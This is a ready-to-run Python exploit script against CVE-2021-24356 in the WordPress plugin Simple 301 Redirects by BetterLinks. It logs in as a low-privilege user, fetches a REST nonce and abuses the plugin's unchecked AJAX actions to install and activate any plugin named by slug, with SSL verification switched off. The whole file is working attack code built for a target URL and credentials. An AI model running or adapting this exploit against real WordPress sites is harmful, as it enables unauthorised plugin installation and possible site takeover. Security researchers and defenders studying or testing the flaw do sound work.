#!/usr/bin/env python3
import requests
import argparse
import os


#
# Exploit script by @RandomRobbieBF
#

http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

# Ignore bad SSL
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def login_and_activate_plugin(siteurl, wp_user, wp_pass,slug):


    # Log in
    session = requests.Session()
    session.verify = False  # Ignore SSL verification
    login_url = siteurl + '/wp-login.php'
    response = session.post(login_url, verify=False, data={
        'log': wp_user,
        'pwd': wp_pass,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    })

    # Get REST API Nonce
    print('Getting REST API Nonce!')
    nonce_url = siteurl + '/wp-admin/admin-ajax.php?action=rest-nonce'
    nonce_response = session.get(nonce_url)
    rest_nonce = nonce_response.text.strip()
    
    print("Nonce Found: "+rest_nonce+"")
    
    # Install  Plugin
    print('Installing Plugin!')
    paramsPost = {"action":"simple301redirects/admin/install_plugin","security":rest_nonce,"slug":slug}
    headers = {"Origin":"http://wordpress.lan","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0","Referer":""+siteurl+"wp-admin/options-general.php?page=301options","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
    install_response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers,verify=False)
    print(install_response.text)
    

    # Activate Plugin
    print('Activating Plugin!')
    sluga = ""+slug+"/"+slug+".php"
    paramsPost = {"action":"simple301redirects/admin/activate_plugin","security":rest_nonce,"basename":sluga}
    headers = {"Origin":"http://wordpress.lan","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0","Referer":"http://wordpress.lan/wp-admin/options-general.php?page=301options","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate"}
    activate_response = session.post(""+siteurl+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers,verify=False)
    print(activate_response.text)

# Add the vulnerability description as a comment
DESCRIPTION = """
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber+ Arbitrary Plugin Activation
Description
CVE-2021-24356 - In the plugin, a lack of capability checks and insufficient nonce check on the AJAX action, simple301redirects/admin/activate_plugin, made it possible for authenticated users to activate arbitrary plugins installed on vulnerable sites. 
"""


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description=DESCRIPTION)
    parser.add_argument('--url', required=True, help='URL of the WordPress site')
    parser.add_argument('--username', required=True, help='WordPress username')
    parser.add_argument('--password', required=True, help='WordPress password')
    parser.add_argument('--slug', required=True, help='WordPress Plugin Slug')
    args = parser.parse_args()

    login_and_activate_plugin(args.url, args.username, args.password,args.slug)